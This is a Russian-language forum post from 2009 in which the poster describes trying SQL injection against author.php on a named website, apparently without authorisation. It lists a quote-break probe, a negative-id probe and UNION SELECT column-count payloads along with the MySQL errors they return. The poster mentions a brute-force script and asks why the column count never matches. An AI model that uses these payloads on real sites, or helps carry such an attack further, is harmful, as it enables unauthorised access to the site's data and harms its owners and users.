
12.12.2009, 18:50
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Доброго времени суток.
Есть проблема:
http://vb.by/author.php?topic=11&author=9'
Выдеёт:
SQL request caused an error.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
http://vb.by/author.php?topic=11&author=-1
Выдаёт:
SQL request caused an error. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND project_id<>1 AND project_id<>2 ORDER BY `date` DESC LIMIT 0, 15' at line 1
Пробую найти колво столбцов:
http://vb.by/author.php?topic=11&author=-1+UNION+Select+1%20--%20
Страницу открывает, в исх коде в самом конце пришет:
SQL request caused an error. The used SELECT statements have a different number of columns
Потаюсь подобрать дальше:
http://vb.by/author.php?topic=11&author=-1+UNION+Select+1,2%20--%20
Открывает страничку на которой только написано:
SQL request caused an error. The used SELECT statements have a different number of columns
Написал прогу чтобы вручную не перебирать, и сколько бы я не брал столюцов пишет different number of columns
Что ето может быть такое???
|
|
|